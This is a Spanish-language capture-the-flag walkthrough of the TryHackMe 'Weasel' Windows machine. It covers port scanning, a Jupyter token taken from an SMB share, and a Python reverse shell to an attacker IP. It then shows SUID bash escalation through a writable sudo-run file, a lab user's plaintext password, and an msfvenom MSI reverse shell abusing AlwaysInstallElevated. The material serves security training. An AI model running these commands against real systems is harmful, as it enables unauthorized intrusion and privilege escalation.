Weasel
| Sistema operativo | Dificultad | Fecha de Lanzamiento | Creador |
|---|---|---|---|
| Windows | Medium | 19 Mayo 2023 | tryhackme & huskyhacks |
Reconocimiento
Lanzamos una traza ICMP a la máquina objetivo para comprobar que tengamos conectividad.
Enumeración inicial
Realizamos un escaneo con nmap para descubrir que puertos TCP se encuentran abiertos en la máquina víctima.
nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.93.174
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-27 11:12 -03
Initiating SYN Stealth Scan at 11:12
Scanning 10.10.93.174 [65535 ports]
Discovered open port 22/tcp on 10.10.93.174
Discovered open port 445/tcp on 10.10.93.174
Discovered open port 3389/tcp on 10.10.93.174
Discovered open port 135/tcp on 10.10.93.174
Discovered open port 139/tcp on 10.10.93.174
Discovered open port 8888/tcp on 10.10.93.174
Discovered open port 5985/tcp on 10.10.93.174
Discovered open port 49672/tcp on 10.10.93.174
Discovered open port 47001/tcp on 10.10.93.174
Discovered open port 49664/tcp on 10.10.93.174
Discovered open port 49669/tcp on 10.10.93.174
Discovered open port 49667/tcp on 10.10.93.174
Discovered open port 49668/tcp on 10.10.93.174
Discovered open port 49670/tcp on 10.10.93.174
Discovered open port 49665/tcp on 10.10.93.174
Completed SYN Stealth Scan at 11:13, 19.50s elapsed (65535 total ports)
Nmap scan report for 10.10.93.174
Host is up, received user-set (0.23s latency).
Scanned at 2025-03-27 11:12:55 -03 for 20s
Not shown: 65376 closed tcp ports (reset), 144 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
8888/tcp open sun-answerbook syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49668/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
49670/tcp open unknown syn-ack ttl 127
49672/tcp open unknown syn-ack ttl 127
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 19.73 seconds
Raw packets sent: 93235 (4.102MB) | Rcvd: 70065 (2.803MB)
Lanzamos una serie de script básicos de enumeración propios de nmap, para conocer la versión y servicio que esta corriendo bajo los puertos.
nmap -sCV -p22,135,139,445,3389,5985,8888,47001,49664,49665,49667,49668,49669,49670,49672 -oN servicesScan 10.10.93.174
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-27 11:13 -03
Nmap scan report for 10.10.93.174 (10.10.93.174)
Host is up (0.33s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 2b:17:d8:8a:1e:8c:99:bc:5b:f5:3d:0a:5e:ff:5e:5e (RSA)
| 256 3c:c0:fd:b5:c1:57:ab:75:ac:81:10:ae:e2:98:12:0d (ECDSA)
|_ 256 e9:f0:30:be:e6:cf:ef:fe:2d:14:21:a0:ac:45:7b:70 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-03-27T14:16:54+00:00; +2m07s from scanner time.
| rdp-ntlm-info:
| Target_Name: DEV-DATASCI-JUP
| NetBIOS_Domain_Name: DEV-DATASCI-JUP
| NetBIOS_Computer_Name: DEV-DATASCI-JUP
| DNS_Domain_Name: DEV-DATASCI-JUP
| DNS_Computer_Name: DEV-DATASCI-JUP
| Product_Version: 10.0.17763
|_ System_Time: 2025-03-27T14:16:47+00:00
| ssl-cert: Subject: commonName=DEV-DATASCI-JUP
| Not valid before: 2025-03-26T14:00:55
|_Not valid after: 2025-09-25T14:00:55
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8888/tcp open http Tornado httpd 6.0.3
| http-robots.txt: 1 disallowed entry
|_/
| http-title: Jupyter Notebook
|_Requested resource was /login?next=%2Ftree%3F
|_http-server-header: TornadoServer/6.0.3
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2m07s, deviation: 0s, median: 2m06s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-03-27T14:16:45
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.44 seconds
Explotación inicial
HTTP(8888) - Jupyter Notebook
Jupyter Notebook es una ==aplicación web que permite crear y compartir documentos que contienen código, texto, ecuaciones, y visualizaciones==. Es una herramienta de código abierto que se usa para:
- Desarrollar, documentar, y presentar proyectos
- Visualizar datos en ciencia de datos y big data
- Realizar simulaciones numéricas
- Preparar y exponer datos
Jupyter Notebook es muy popular entre científicos de datos, analistas, y desarrolladores
Samba (445)
Listamos recursos compartidos
Utilizamos el token para iniciar sesión.
067470c5ddsadc54153ghfjd817d15b5d5f5341e56b0dsad78a
import socket,os,pty;s=socket.socket();s.connect(("10.9.2.3", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")
Nos ponemos en escucha con Netcat
rlwrap nc -lnvp 4444
Ejecutamos el código.
Escalamos privilegios
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash'> /home/dev-datasci/.local/bin/jupyter
chmod +x /home/dev-datasci/.local/bin/jupyter
sudo /home/dev-datasci/.local/bin/jupyter
cd /tmp
./bash -p
Elevación de privilegios
Obtenemos del home del usuario dev-datasci su clave ssh.
ssh -i weasel_id_ssh dev-datasci-lowpriv@10.10.93.174
dev-datasci-lowpriv:wUqnKWqzha*W!PWrPRWi!M8faUn
AlwaysInstallElevated
La política Always Install Elevated es una configuración en Windows que permite a los usuarios estándar instalar aplicaciones con privilegios elevados. Cuando esta política está habilitada, cualquier instalación de aplicación iniciada por un usuario estándar se ejecuta con derechos administrativos, evitando así las solicitudes de Control de Cuentas de Usuario (UAC).
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
Creamos un payload con msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.2.3 LPORT=443 -a x64 --platform Windows -f msi -o shell.msi
Lo transferimos a la máquina víctima.
Nos ponemos en escucha con NetCat por el puerto 443.
rlwrap nc -lnvp 443
Ejecutamos el siguiente comando:
runas /user:dev-datasci-lowpriv "cmd /c msiexec /i C:\Users\dev-datasci-lowpriv\Desktop\shell.msi /quiet /qn /norestart"
Post Explotación
Leemos la flag de root.txt.
